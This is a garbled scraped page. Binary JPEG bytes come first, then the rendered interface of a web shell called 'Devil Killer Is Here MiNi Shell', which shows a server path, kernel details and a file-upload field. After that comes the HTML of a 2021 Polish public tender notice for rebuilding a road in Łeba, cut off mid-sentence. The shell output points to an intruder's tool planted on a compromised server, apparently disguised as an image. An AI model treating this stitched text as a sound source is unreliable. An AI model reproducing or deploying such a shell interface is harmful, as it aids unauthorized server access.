JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210727/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210727/0012811501-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00128115 z dnia 2021-07-27</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi gminnej nr 104049G ul. Wróblewskiego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Łeba</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770979743</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kościuszki 90</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łeba</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">59 8661 510</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">59 8661 337</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@leba.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://leba.um.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi gminnej nr 104049G ul. Wróblewskiego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-87f6b056-eebe-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00128115</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002619/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Przebudowa ul. Wróblewskiego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/leba <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/leba</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się drogą elektroniczną przy użyciu platformy zakupowej dostępnej pod adresem:<br/>https://platformazakupowa.pl/pn/leba<br/>2. Zaleca się, aby Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia<br/>publicznego, posiadał konto na platformie zakupowej. Rejestracja oraz logowanie dostępne jest pod<br/>adresem: https://platformazakupowa.pl/pn/leba Korzystanie z Platformy przez Wykonawcę jest<br/>bezpłatne.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej<br/>przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z platformy zakupowej<br/>dostępnym pod adresem: https://platformazakupowa.pl/strona/1-regulamin.<br/>4. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego,<br/>akceptuje warunki korzystania z platformy zakupowej, określone w Regulaminie dostępnym pod<br/>adresem: https://platformazakupowa.pl/strona/1-regulamin.<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia i<br/>wycofania oferty oraz do komunikacji wynosi 150MB.<br/>6. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 pzp, podmiotowych<br/>środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub<br/>dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na platformę<br/>zakupową.<br/>7. W postępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna niż oferta Wykonawcy<br/>i załączniki do oferty) odbywa się elektronicznie za pośrednictwem platformy zakupowej i formularza<br/>Wyślij wiadomość. Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana.<br/>We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy<br/>posługują się numerem ogłoszenia (BZP)<br/>8. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej,<br/>Ogłoszenie nr 2021/BZP 00075919/01 z dnia 2021-06-08<br/>2021-06-08 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>email: iwona.mielewczyk@leba.eu.<br/>9. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń<br/>składane są przez Wykonawcę jako załączniki. Zamawiający dopuszcza również możliwość składania<br/>dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za<br/>pomocą poczty elektronicznej, na adres email: iwona.mielewczyk@leba.eu. Sposób sporządzenia<br/>dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi<br/>być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia<br/>2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452).<br/>10. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy<br/>użyciu środków komunikacji elektronicznej, wskazanych w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1.<br/>administratorem Pani/Pana danych osobowych jest Urząd Miejski w Łebie, ul.Kościuszki 90, 84-360<br/>Łeba, tel. 598661510;<br/>2.<br/>inspektorem ochrony danych osobowych w Urzędzie Miejskim w Łebie jest Pan Radosław Czyżewski,<br/>kontakt: adres e-mail: radoslaw.czyzewski@leba.eu, telefon 59 8661 510 wew. 44;<br/>3.<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>z niniejszym postępowaniem o udzielenie zamówienia publicznego;<br/>4.<br/>odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. –<br/>Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 1843 z późn. zm.), dalej „ustawa Pzp”;<br/>5.<br/>Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat<br/>od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6.<br/>obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>7.<br/>w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>8.<br/>posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.271.12.2021.MJ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest: Przebudowa ul. Wróblewskiego w Łebie<br/>2. Prace należy wykonać na podstawie dokumentacji projektowej pn. Przebudowa<br/>ul.Wróblewskiego, wykonanej przez NEOX Sp. z o.o. stanowiącej załącznik nr 8 do niniejszej<br/>SWZ<br/>3. Szczegółowy zakres w/w prac do wykonania, określony został w dokumentacji projektowej<br/>budowlanej, specyfikacjach technicznych wykonania i odbioru robót, które stanowią załącznik nr<br/>8 SWZ. Dokumentacja projektowa, specyfikacje techniczne wykonania i odbioru robót oraz<br/>obejmują całość zadania inwestycyjnego.<br/>W przypadku wystąpienia w którejkolwiek pozycji przedmiotu zamówienia nazw własnych<br/>Zamawiający dopuszcza zastosowanie rozwiązań równoważnych.<br/>Zamawiający dopuszcza ujęcie w ofercie, a następnie wbudowanie rozwiązań równoważnych<br/>polegających na zastosowaniu innych materiałów i urządzeń niż podane w dokumentacji<br/>projektowej pod warunkiem zapewnienia wszystkich parametrów nie gorszych niż określone w<br/>tej dokumentacji. W takiej sytuacji Zamawiający wymaga, zgodnie z art. 101 ust. 5 Pzp złożenia<br/>stosownych dokumentów, uwiarygodniających równoważność tych materiałów i urządzeń.<br/>Złożone ww. dokumenty będą podlegały ocenie przez autora dokumentacji projektowej, który<br/>sporządzi stosowną opinię. Opinia ta będzie podstawą do podjęcia przez Zamawiającego<br/>decyzji o przyjęciu oferty lub jej odrzuceniu z powodu „nierównoważności” zaproponowanych<br/>rozwiązań równoważnych. W przypadku, gdy Wykonawca nie złoży w ofercie dokumentów o<br/>zastosowaniu innych materiałów i urządzeń, to rozumie się przez to, że do kalkulacji ceny oferty<br/>ujęto materiały i urządzenia zaproponowane w dokumentacji projektowej. Pod pojęciem<br/>„parametry” rozumie się funkcjonalność, przeznaczenie, kolorystykę, strukturę, rodzaj materiału,<br/>kształt, wielkość, bezpieczeństwo, wytrzymałość oraz pozostałe parametry przypisane<br/>poszczególnym materiałom i urządzeniom w Dokumentacji projektowej. Dopisuje się wyraz „lub<br/>równoważny” do wszystkich nazw, znaków towarowych, patentów lub pochodzenia wskazanych<br/>w Dokumentacji projektowej. Wszystkie zapisy SWZ należy rozpatrywać łącznie z opisem<br/>technicznym zawartym w Dokumentacji projektowej. W sytuacji, gdy wymagania w SWZprzekraczają wymagania zawarte w normach zastosowanie mają postanowienia zawarte w<br/>SWZ.<br/>Załączone do SWZ przedmiary robót nie są obowiązujące i stanowią jedynie materiał<br/>pomocniczy dla Wykonawcy, który w celu opracowania oferty winien opracować własny<br/>przedmiar robót opierając się na projekcie dokumentacji budowlanej. Dokumentacja projektowa,<br/>specyfikacje techniczne wykonania i odbioru robót oraz przedmiar robót obejmują całość<br/>zadania inwestycyjnego.<br/>Zasilanie terenu budowy w energię elektryczną i wodę oraz odbiór odpadów i nieczystości<br/>Wykonawca zobowiązany będzie wykonać na własny koszt i własnym staraniem.<br/>Wykonawca ma obowiązek zabezpieczyć materiały rozbiórkowe w taki sposób, aby mogły one<br/>być wykorzystane do ponownego wykorzystania. W szczególności dotyczy to krawężników,<br/>kostki drogowej, płytek, oznakowania drogowego i słupów oświetleniowych. Rozbiórka<br/>nawierzchni asfaltowych ma nastąpić w taki sposób aby powstały z rozbiórki materiał<br/>Zamawiający mógł wykorzystać powtórnie. Wykonawca ma obowiązek zdać powstały materiał<br/>protokolarnie z uwzględnieniem jego rodzaju i ilości. Szacuje się, że do ponownego<br/>wykorzystania należy przekazać około 140m2 kostki i 140mb krawężnika oraz odzyskać do<br/>ponownego wykorzystania 500m2 asfaltu.<br/>Wykonawca dostarczy 6 ławek i 4 kosze na odpady i zamontuje w miejscach wskazanych przez<br/>Zamawiajacego.<br/>Wykonawca ma obowiązek wykonania i wprowadzenia czasowej organizacji ruchu na czas<br/>trwania prac. Konieczne jest zapewnienie ciągłego dojazdu do posesji dla mieszkańców ulicy i<br/>służb ratunkowych. Dopuszcza się czasowe i krótkotrwałe zamknięcia przejezdności po<br/>wcześniejszym zawiadomieniu mieszkańców i Zamawiającego z określeniem czasu zamknięcia i<br/>wprowadzeniem właściwej czasowej organizacji ruchu.<br/>4. Zamawiający dopuszcza powierzenie wykonania części zamówienia Podwykonawcy.<br/>Zamawiający nie zastrzega obowiązku wykonania przez wykonawcę kluczowych zadań.<br/>5. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, których<br/>wykonanie powierzy Podwykonawcom, oraz podania nazw ewentualnych Podwykonawców,<br/>jeżeli są już znani.<br/>6. Zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez wykonawcę lub<br/>podwykonawcę osób do wykonywania wskazanych poniżej czynności w trakcie realizacji<br/>zamówienia:<br/>• pracami przygotowawczymi, w tym rozbiórkowymi i odtworzeniowymi konstrukcji oraz<br/>nawierzchni,<br/>• robotami nawierzchniowymi związanymi z asfaltowaniem oraz układaniem nawierzchni<br/>betonowych i kamiennych,<br/>• budową sieci i przyłączy kanalizacji deszczowej, elektrycznej, telekomunikacyjnej oraz<br/>usuwaniem kolizji na sieciach oraz pracami wykończeniowymi na sieciach i przyłączach oraz<br/>studniach w tym na sieci i przyłączach wodociągowych i kanalizacji sanitarnej,<br/>• pracami związanymi z ustawieniem oświetlenia oraz innymi pracami w zakresie elektryki,<br/>• pracami montażu obiektów małej architektury, znaków drogowych oraz pracami<br/>wykończeniowymi,<br/>• pracami wykończeniowymi.<br/>7. W trakcie realizacji zamówienia zamawiający uprawniony jest do wykonywania czynności<br/>kontrolnych wobec wykonawcy odnośnie spełniania przez wykonawcę lub podwykonawcę<br/>wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w punkcie 4<br/>czynności. Zamawiający uprawniony jest w szczególności do:<br/>a) żądania oświadczeń i dokumentów w zakresie potwierdzenia spełniania ww. wymogów i<br/>dokonywania ich oceny,<br/>b) żądania wyjaśnień w przypadku wątpliwości w zakresie potwierdzenia spełniania ww.<br/>wymogów,<br/>c) przeprowadzania kontroli na miejscu wykonywania świadczenia.<br/>8. W trakcie realizacji zamówienia na każde wezwanie zamawiającego w wyznaczonym w tym<br/>wezwaniu terminie wykonawca przedłoży zamawiającemu wskazane poniżej dowody w celu potwierdzenia spełnienia wymogu zatrudnienia na podstawie umowy o pracę przez wykonawcę<br/>lub podwykonawcę osób wykonujących wskazane w punkcie 4 czynności w trakcie realizacji<br/>zamówienia:<br/>• oświadczenie wykonawcy lub podwykonawcy o zatrudnieniu na podstawie umowy o pracę<br/>osób wykonujących czynności, których dotyczy wezwanie zamawiającego. Oświadczenie to<br/>powinno zawierać w szczególności: dokładne określenie podmiotu składającego oświadczenie,<br/>datę złożenia oświadczenia, wskazanie, że objęte wezwaniem czynności wykonują osoby<br/>zatrudnione na podstawie umowy o pracę wraz ze wskazaniem liczby tych osób, imion i nazwisk<br/>tych osób, rodzaju umowy o pracę i wymiaru etatu oraz podpis osoby uprawnionej do złożenia<br/>oświadczenia w imieniu wykonawcy lub podwykonawcy;<br/>• poświadczoną za zgodność z oryginałem odpowiednio przez wykonawcę lub podwykonawcę<br/>kopię umowy/umów o pracę osób wykonujących w trakcie realizacji zamówienia czynności,<br/>których dotyczy ww. oświadczenie wykonawcy lub podwykonawcy (wraz z dokumentem<br/>regulującym zakres obowiązków, jeżeli został sporządzony). Kopia umowy/umów powinna<br/>zostać zanonimizowana w sposób zapewniający ochronę danych osobowych pracowników,<br/>zgodnie z przepisami ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych (Dz. U. z<br/>2018 r., poz. 1000) (tj. w szczególności bez adresów, nr PESEL pracowników). Imię i nazwisko<br/>pracownika nie podlega anonimizacji. Informacje takie jak: data zawarcia umowy, rodzaj umowy<br/>o pracę i wymiar etatu powinny być możliwe do zidentyfikowania;<br/>• zaświadczenie właściwego oddziału ZUS, potwierdzające opłacanie przez wykonawcę lub<br/>podwykonawcę składek na ubezpieczenia społeczne i zdrowotne z tytułu zatrudnienia na<br/>podstawie umów o pracę za ostatni okres rozliczeniowy;<br/>• poświadczoną za zgodność z oryginałem odpowiednio przez wykonawcę lub podwykonawcę<br/>kopię dowodu potwierdzającego zgłoszenie pracownika przez pracodawcę do ubezpieczeń,<br/>zanonimizowaną w sposób zapewniający ochronę danych osobowych pracowników, zgodnie z<br/>przepisami ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych (Dz. U. z 2018 r., poz.<br/>1000). Imię i nazwisko pracownika nie podlega anonimizacji.<br/>9. Z tytułu niespełnienia przez wykonawcę lub podwykonawcę wymogu zatrudnienia na<br/>podstawie umowy o pracę osób wykonujących wskazane w punkcie 4 czynności zamawiający<br/>przewiduje sankcję w postaci obowiązku zapłaty przez wykonawcę kary umownej w wysokości<br/>określonej w istotnych postanowieniach umowy w sprawie zamówienia publicznego. Niezłożenie<br/>przez wykonawcę w wyznaczonym przez zamawiającego terminie żądanych przez<br/>zamawiającego dowodów w celu potwierdzenia spełnienia przez wykonawcę lub podwykonawcę<br/>wymogu zatrudnienia na podstawie umowy o pracę traktowane będzie jako niespełnienie przez<br/>wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób<br/>wykonujących wskazane w punkcie 4 czynności.<br/>10. W przypadku uzasadnionych wątpliwości co do przestrzegania prawa pracy przez<br/>wykonawcę lub podwykonawcę, zamawiający może zwrócić się o przeprowadzenie kontroli<br/>przez Państwową Inspekcję Pracy.<br/>11. W przypadku ujawnienia w trakcie kontroli niespełnienia wymagań dotyczących zatrudnienia<br/>pracowników na umowę o pracę, Zamawiający naliczy kary umowne.<br/>12. Zamawiający nie stawia wymagań w zakresie zatrudnienia osób o których mowa w art. 96<br/>ust. 2 pkt. 2 ustawy Prawo Zamówień publicznych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielanie zamówień, o których mowa w art. 214 ust. 1 